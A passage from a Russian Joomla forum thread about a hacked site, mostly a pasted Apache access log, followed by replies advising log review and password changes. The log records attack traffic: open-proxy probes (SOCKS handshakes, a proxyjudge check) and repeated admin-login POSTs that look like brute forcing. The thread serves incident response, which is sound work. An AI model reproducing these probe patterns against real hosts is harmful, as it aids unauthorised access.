92.113.116.115 - - [18/Jan/2014:00:25:17 +0200] "-" 400 0 "-" "-"
193.17.208.66 - - [18/Jan/2014:00:25:21 +0200] "-" 400 0 "-" "-"
193.17.208.66 - - [18/Jan/2014:00:25:21 +0200] "-" 400 0 "-" "-"
193.17.208.66 - - [18/Jan/2014:00:25:21 +0200] "-" 400 0 "-" "-"
193.17.208.66 - - [18/Jan/2014:00:25:21 +0200] "-" 400 0 "-" "-"
193.17.208.66 - - [18/Jan/2014:00:25:21 +0200] "-" 400 0 "-" "-"
193.17.208.66 - - [18/Jan/2014:00:25:21 +0200] "-" 400 0 "-" "-"
194.28.84.86 - - [18/Jan/2014:00:25:24 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
78.111.187.26 - - [18/Jan/2014:00:25:49 +0200] "-" 400 0 "-" "-"
78.111.187.26 - - [18/Jan/2014:00:25:49 +0200] "-" 400 0 "-" "-"
78.111.187.26 - - [18/Jan/2014:00:26:19 +0200] "-" 400 0 "-" "-"
78.111.187.26 - - [18/Jan/2014:00:26:19 +0200] "-" 400 0 "-" "-"
78.111.187.26 - - [18/Jan/2014:00:26:19 +0200] "-" 400 0 "-" "-"
194.28.84.86 - - [18/Jan/2014:00:27:30 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
78.111.187.26 - - [18/Jan/2014:00:27:36 +0200] "-" 400 0 "-" "-"
78.111.187.26 - - [18/Jan/2014:00:27:36 +0200] "-" 400 0 "-" "-"
78.111.187.26 - - [18/Jan/2014:00:27:36 +0200] "-" 400 0 "-" "-"
194.28.84.86 - - [18/Jan/2014:00:29:48 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
194.28.84.86 - - [18/Jan/2014:00:32:08 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
194.28.84.86 - - [18/Jan/2014:00:34:24 +0200] "-" 400 0 "-" "-"
95.158.48.46 - - [18/Jan/2014:00:34:33 +0200] "-" 400 0 "-" "-"
95.158.48.46 - - [18/Jan/2014:00:34:33 +0200] "-" 400 0 "-" "-"
95.158.48.46 - - [18/Jan/2014:00:34:33 +0200] "-" 400 0 "-" "-"
95.158.48.46 - - [18/Jan/2014:00:34:33 +0200] "-" 400 0 "-" "-"
176.15.150.85 - - [18/Jan/2014:00:35:10 +0200] "-" 400 0 "-" "-"
194.28.84.86 - - [18/Jan/2014:00:35:32 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
194.28.84.86 - - [18/Jan/2014:00:43:53 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
194.28.84.86 - - [18/Jan/2014:00:45:20 +0200] "-" 400 0 "-" "-"
83.134.122.58 - - [18/Jan/2014:00:45:27 +0200] "-" 400 0 "-" "-"
93.170.37.50 - - [18/Jan/2014:00:46:57 +0200] "-" 400 0 "-" "-"
93.170.37.50 - - [18/Jan/2014:00:47:12 +0200] "-" 400 0 "-" "-"
93.170.37.50 - - [18/Jan/2014:00:47:12 +0200] "-" 400 0 "-" "-"
194.28.84.86 - - [18/Jan/2014:00:47:33 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
92.113.116.115 - - [18/Jan/2014:00:48:04 +0200] "-" 400 0 "-" "-"
194.28.84.86 - - [18/Jan/2014:00:49:33 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
194.28.84.86 - - [18/Jan/2014:00:51:33 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
95.58.181.222 - - [18/Jan/2014:00:51:51 +0200] "-" 400 0 "-" "-"
95.58.181.222 - - [18/Jan/2014:00:51:51 +0200] "-" 400 0 "-" "-"
194.28.84.86 - - [18/Jan/2014:00:53:41 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
46.191.188.171 - - [18/Jan/2014:00:54:47 +0200] "-" 400 0 "-" "-"
193.17.208.66 - - [18/Jan/2014:00:55:57 +0200] "-" 400 0 "-" "-"
193.17.208.66 - - [18/Jan/2014:00:55:57 +0200] "-" 400 0 "-" "-"
193.17.208.66 - - [18/Jan/2014:00:55:57 +0200] "-" 400 0 "-" "-"
193.17.208.66 - - [18/Jan/2014:00:55:57 +0200] "-" 400 0 "-" "-"
193.17.208.66 - - [18/Jan/2014:00:55:57 +0200] "-" 400 0 "-" "-"
193.17.208.66 - - [18/Jan/2014:00:55:57 +0200] "-" 400 0 "-" "-"
194.28.84.86 - - [18/Jan/2014:00:56:20 +0200] "-" 400 0 "-" "-"
92.113.116.115 - - [18/Jan/2014:00:56:55 +0200] "-" 400 0 "-" "-"
[code]
194.28.84.86 - - [18/Jan/2014:00:58:53 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
151.0.37.39 - - [18/Jan/2014:01:00:30 +0200] "-" 400 0 "-" "-"
151.0.37.39 - - [18/Jan/2014:01:00:30 +0200] "-" 400 0 "-" "-"
151.0.37.39 - - [18/Jan/2014:01:00:30 +0200] "-" 400 0 "-" "-"
151.0.37.39 - - [18/Jan/2014:01:00:30 +0200] "-" 400 0 "-" "-"
151.0.37.39 - - [18/Jan/2014:01:00:40 +0200] "-" 400 0 "-" "-"
91.200.56.21 - - [18/Jan/2014:01:01:08 +0200] "-" 400 0 "-" "-"
91.200.56.21 - - [18/Jan/2014:01:01:17 +0200] "-" 400 0 "-" "-"
91.200.56.21 - - [18/Jan/2014:01:01:17 +0200] "-" 400 0 "-" "-"
91.200.56.21 - - [18/Jan/2014:01:01:17 +0200] "-" 400 0 "-" "-"
91.200.56.21 - - [18/Jan/2014:01:01:17 +0200] "-" 400 0 "-" "-"
194.28.84.86 - - [18/Jan/2014:01:01:24 +0200] "-" 400 0 "-" "-"
151.0.37.39 - - [18/Jan/2014:01:01:30 +0200] "-" 400 0 "-" "-"
151.0.37.39 - - [18/Jan/2014:01:01:30 +0200] "-" 400 0 "-" "-"
151.0.37.39 - - [18/Jan/2014:01:01:30 +0200] "-" 400 0 "-" "-"
91.200.56.21 - - [18/Jan/2014:01:01:34 +0200] "-" 400 0 "-" "-"
91.200.56.21 - - [18/Jan/2014:01:01:41 +0200] "-" 400 0 "-" "-"
91.200.56.21 - - [18/Jan/2014:01:01:41 +0200] "-" 400 0 "-" "-"
91.200.56.21 - - [18/Jan/2014:01:02:20 +0200] "-" 400 0 "-" "-"
91.200.56.21 - - [18/Jan/2014:01:02:20 +0200] "-" 400 0 "-" "-"
91.200.56.21 - - [18/Jan/2014:01:02:20 +0200] "-" 400 0 "-" "-"
91.200.56.21 - - [18/Jan/2014:01:02:20 +0200] "-" 400 0 "-" "-"
91.200.56.21 - - [18/Jan/2014:01:02:20 +0200] "-" 400 0 "-" "-"
91.200.56.21 - - [18/Jan/2014:01:02:26 +0200] "-" 400 0 "-" "-"
91.200.56.21 - - [18/Jan/2014:01:02:26 +0200] "-" 400 0 "-" "-"
91.200.56.21 - - [18/Jan/2014:01:02:26 +0200] "-" 400 0 "-" "-"
91.200.56.21 - - [18/Jan/2014:01:02:26 +0200] "-" 400 0 "-" "-"
91.200.56.21 - - [18/Jan/2014:01:02:46 +0200] "-" 400 0 "-" "-"
91.200.56.21 - - [18/Jan/2014:01:02:46 +0200] "-" 400 0 "-" "-"
91.200.56.21 - - [18/Jan/2014:01:02:46 +0200] "-" 400 0 "-" "-"
91.200.56.21 - - [18/Jan/2014:01:02:46 +0200] "-" 400 0 "-" "-"
91.200.56.21 - - [18/Jan/2014:01:02:46 +0200] "-" 400 0 "-" "-"
91.200.56.21 - - [18/Jan/2014:01:04:15 +0200] "-" 400 0 "-" "-"
91.200.56.21 - - [18/Jan/2014:01:04:15 +0200] "-" 400 0 "-" "-"
91.200.56.21 - - [18/Jan/2014:01:04:15 +0200] "-" 400 0 "-" "-"
91.200.56.21 - - [18/Jan/2014:01:04:15 +0200] "-" 400 0 "-" "-"
91.200.56.21 - - [18/Jan/2014:01:04:15 +0200] "-" 400 0 "-" "-"
91.200.56.21 - - [18/Jan/2014:01:04:15 +0200] "-" 400 0 "-" "-"
69.90.132.223 - - [18/Jan/2014:01:05:42 +0200] "\x00" 400 166 "-" "-"
69.90.132.223 - - [18/Jan/2014:01:05:44 +0200] "GET http://proxyjudge.info HTTP/1.1" 200 111 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28 (.NET CLR 3.5.30729)"
69.90.132.223 - - [18/Jan/2014:01:05:49 +0200] "\x04\x01\x00P\xC0\x03\xB1\xAA0\x00" 400 166 "-" "-"
69.90.132.223 - - [18/Jan/2014:01:05:49 +0200] "\x04\x01\x00P\xC0\x03\xB1\xAA0\x00" 400 166 "-" "-"
69.90.132.223 - - [18/Jan/2014:01:05:58 +0200] "\x05\x01\x00" 400 166 "-" "-"
194.28.84.86 - - [18/Jan/2014:01:07:00 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
194.28.84.86 - - [18/Jan/2014:01:09:15 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
92.112.140.233 - - [18/Jan/2014:01:09:35 +0200] "-" 400 0 "-" "-"
194.28.84.86 - - [18/Jan/2014:01:12:58 +0200] "-" 400 0 "-" "-"
93.77.91.133 - - [18/Jan/2014:01:14:11 +0200] "-" 400 0 "-" "-"
194.28.84.86 - - [18/Jan/2014:01:15:01 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
194.28.84.86 - - [18/Jan/2014:01:17:01 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
193.17.208.66 - - [18/Jan/2014:01:17:38 +0200] "-" 400 0 "-" "-"
194.28.84.86 - - [18/Jan/2014:01:19:02 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
194.28.84.86 - - [18/Jan/2014:01:21:02 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
194.28.84.86 - - [18/Jan/2014:01:23:31 +0200] "-" 400 0 "-" "-"
194.28.84.86 - - [18/Jan/2014:01:25:42 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
194.28.84.86 - - [18/Jan/2014:01:27:42 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
194.28.84.86 - - [18/Jan/2014:01:29:48 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
78.164.147.3 - - [18/Jan/2014:01:30:33 +0200] "GET /administrator/index.php HTTP/1.1" 200 4574 "-" "Mozilla/3.0 (compatible; Indy Library)"
78.164.147.3 - - [18/Jan/2014:01:30:36 +0200] "POST /administrator/index.php HTTP/1.0" 303 0 "-" "Mozilla/3.0 (compatible; Indy Library)"
78.164.147.3 - - [18/Jan/2014:01:30:37 +0200] "POST /administrator/index.php HTTP/1.0" 303 0 "-" "Mozilla/3.0 (compatible; Indy Library)"
78.164.147.3 - - [18/Jan/2014:01:30:37 +0200] "POST /administrator/index.php HTTP/1.0" 303 0 "-" "Mozilla/3.0 (compatible; Indy Library)"
78.164.147.3 - - [18/Jan/2014:01:30:38 +0200] "POST /administrator/index.php HTTP/1.0" 303 0 "-" "Mozilla/3.0 (compatible; Indy Library)"
78.164.147.3 - - [18/Jan/2014:01:30:39 +0200] "POST /administrator/index.php HTTP/1.0" 303 0 "-" "Mozilla/3.0 (compatible; Indy Library)"
78.164.147.3 - - [18/Jan/2014:01:30:39 +0200] "POST /administrator/index.php HTTP/1.0" 303 0 "-" "Mozilla/3.0 (compatible; Indy Library)"
78.164.147.3 - - [18/Jan/2014:01:30:40 +0200] "POST /administrator/index.php HTTP/1.0" 303 0 "-" "Mozilla/3.0 (compatible; Indy Library)"
78.164.147.3 - - [18/Jan/2014:01:30:45 +0200] "POST /administrator/index.php HTTP/1.0" 303 0 "-" "Mozilla/3.0 (compatible; Indy Library)"
78.164.147.3 - - [18/Jan/2014:01:30:45 +0200] "GET /administrator/index.php HTTP/1.1" 200 7057 "-" "Mozilla/3.0 (compatible; Indy Library)"
194.28.84.86 - - [18/Jan/2014:01:31:48 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
194.28.84.86 - - [18/Jan/2014:01:34:20 +0200] "-" 400 0 "-" "-"
194.28.84.86 - - [18/Jan/2014:01:36:38 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
194.28.84.86 - - [18/Jan/2014:01:38:39 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
194.28.84.86 - - [18/Jan/2014:01:40:39 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
194.28.84.86 - - [18/Jan/2014:01:42:47 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
176.120.43.188 - - [18/Jan/2014:01:44:41 +0200] "-" 400 0 "-" "-"
176.120.43.188 - - [18/Jan/2014:01:44:41 +0200] "-" 400 0 "-" "-"
176.120.43.188 - - [18/Jan/2014:01:44:41 +0200] "-" 400 0 "-" "-"
176.120.43.188 - - [18/Jan/2014:01:44:41 +0200] "-" 400 0 "-" "-"
176.120.43.188 - - [18/Jan/2014:01:44:41 +0200] "-" 400 0 "-" "-"
194.28.84.86 - - [18/Jan/2014:01:45:21 +0200] "-" 400 0 "-" "-"
194.28.84.86 - - [18/Jan/2014:01:46:31 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
194.28.84.86 - - [18/Jan/2014:01:48:46 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
194.28.84.86 - - [18/Jan/2014:01:49:58 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
194.28.84.86 - - [18/Jan/2014:01:52:10 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
194.28.84.86 - - [18/Jan/2014:01:54:15 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
194.28.84.86 - - [18/Jan/2014:01:56:22 +0200] "-" 400 0 "-" "-"
194.28.84.86 - - [18/Jan/2014:01:58:32 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
194.28.84.86 - - [18/Jan/2014:02:01:23 +0200] "-" 400 0 "-" "-"
194.28.84.86 - - [18/Jan/2014:02:03:29 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
194.28.84.86 - - [18/Jan/2014:02:05:30 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
194.28.84.86 - - [18/Jan/2014:02:07:30 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
194.28.84.86 - - [18/Jan/2014:02:09:32 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
194.28.84.86 - - [18/Jan/2014:02:12:19 +0200] "-" 400 0 "-" "-"
194.28.84.86 - - [18/Jan/2014:02:13:31 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
194.28.84.86 - - [18/Jan/2014:02:14:53 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
194.28.84.86 - - [18/Jan/2014:02:17:01 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
194.28.84.86 - - [18/Jan/2014:02:19:02 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
91.200.54.32 - - [18/Jan/2014:02:19:33 +0200] "-" 400 0 "-" "-"
91.200.54.32 - - [18/Jan/2014:02:19:33 +0200] "-" 400 0 "-" "-"
91.200.54.32 - - [18/Jan/2014:02:19:33 +0200] "-" 400 0 "-" "-"
91.200.54.32 - - [18/Jan/2014:02:19:33 +0200] "-" 400 0 "-" "-"
91.200.54.32 - - [18/Jan/2014:02:19:33 +0200] "-" 400 0 "-" "-"
194.28.84.86 - - [18/Jan/2014:02:21:15 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
194.28.84.86 - - [18/Jan/2014:02:23:49 +0200] "-" 400 0 "-" "-"
194.28.84.86 - - [18/Jan/2014:02:25:54 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
194.28.84.86 - - [18/Jan/2014:02:27:54 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
194.28.84.86 - - [18/Jan/2014:02:29:56 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
194.28.84.86 - - [18/Jan/2014:02:31:56 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
194.28.84.86 - - [18/Jan/2014:02:34:30 +0200] "-" 400 0 "-" "-"
194.28.84.86 - - [18/Jan/2014:02:36:47 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
194.28.84.86 - - [18/Jan/2014:02:38:47 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
194.28.84.86 - - [18/Jan/2014:02:40:52 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
194.28.84.86 - - [18/Jan/2014:02:43:02 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
194.28.84.86 - - [18/Jan/2014:02:45:19 +0200] "-" 400 0 "-" "-"
194.28.84.86 - - [18/Jan/2014:02:48:40 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
87.225.32.147 - - [18/Jan/2014:02:49:00 +0200] "-" 400 0 "-" "-"
194.28.84.86 - - [18/Jan/2014:02:49:54 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
194.28.84.86 - - [18/Jan/2014:02:52:12 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
194.28.84.86 - - [18/Jan/2014:02:54:18 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
194.28.84.86 - - [18/Jan/2014:02:56:22 +0200] "-" 400 0 "-" "-"
194.28.84.86 - - [18/Jan/2014:02:57:36 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
213.133.185.152 - - [18/Jan/2014:02:59:12 +0200] "-" 400 0 "-" "-"
213.133.185.152 - - [18/Jan/2014:02:59:12 +0200] "-" 400 0 "-" "-"
194.28.84.86 - - [18/Jan/2014:02:59:35 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
213.133.185.152 - - [18/Jan/2014:02:59:54 +0200] "-" 400 0 "-" "-"
194.28.84.86 - - [18/Jan/2014:03:01:20 +0200] "-" 400 0 "-" "-"
194.28.84.86 - - [18/Jan/2014:03:02:24 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
194.28.84.86 - - [18/Jan/2014:03:06:47 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
67.211.195.52 - - [18/Jan/2014:03:06:48 +0200] "-" 400 0 "-" "-"
194.28.84.86 - - [18/Jan/2014:03:08:58 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
194.28.84.86 - - [18/Jan/2014:03:10:58 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
194.28.84.86 - - [18/Jan/2014:03:12:27 +0200] "-" 400 0 "-" "-"
194.28.84.86 - - [18/Jan/2014:03:13:33 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
194.28.84.86 - - [18/Jan/2014:03:17:05 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
194.28.84.86 - - [18/Jan/2014:03:19:11 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
194.28.84.86 - - [18/Jan/2014:03:21:11 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
194.28.84.86 - - [18/Jan/2014:03:23:22 +0200] "-" 400 0 "-" "-"
194.28.84.86 - - [18/Jan/2014:03:25:33 +0200] "GET / HTTP/1.0" 200 12063 "
« Последнее редактирование: 18.01.2014, 23:09:28 от siynik »
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Re: Вирусы на всех хостингах
« Ответ #18 : 19.01.2014, 07:21:18 »

Логи сайта закинул - их много, но выложил как раз за эту ночь и вчерашний вечер - или скинуть файлом? ну если что-то не так сделал - скажите переделаю.
Нужно смотреть логи за примерный тот период, когда был предположительно взлом, а вообще я бы за месяц посмотрел.

*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Re: Вирусы на всех хостингах
« Ответ #19 : 19.01.2014, 10:59:19 »
Цитировать
Сейчас Вам необходимо сменить root пароль от сервера, пароли доступа в панель cPanel / WHM , пароли на почтовые ящики для аккаунта printdec .
делаем простой вывод, они подписались сами, Joomla как бы не пределах
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

[Решено] В php файлах во всех появилась хрень какая-то появилось давно что это ?

Автор altyn

Ответов: 72
Просмотров: 39624
Последний ответ 17.01.2019, 00:51:02
от Roki37
Вирусы на сайте - как лечить

Автор fireman

Ответов: 37
Просмотров: 5286
Последний ответ 08.11.2017, 23:37:08
от dmitry_stas
Проверка на вирусы: как не удалить нужный файл

Автор Vosblog

Ответов: 4
Просмотров: 2461
Последний ответ 05.09.2017, 23:12:57
от ELLE
После взлома сайта вирусы не удаляются

Автор AndreySm

Ответов: 11
Просмотров: 2122
Последний ответ 20.06.2016, 15:05:47
от AndreySm
Бесплатно устраню вирусы - оплачиваете только накладные расходы

Автор Филипп Сорокин

Ответов: 2
Просмотров: 993
Последний ответ 25.05.2016, 14:26:37
от Филипп Сорокин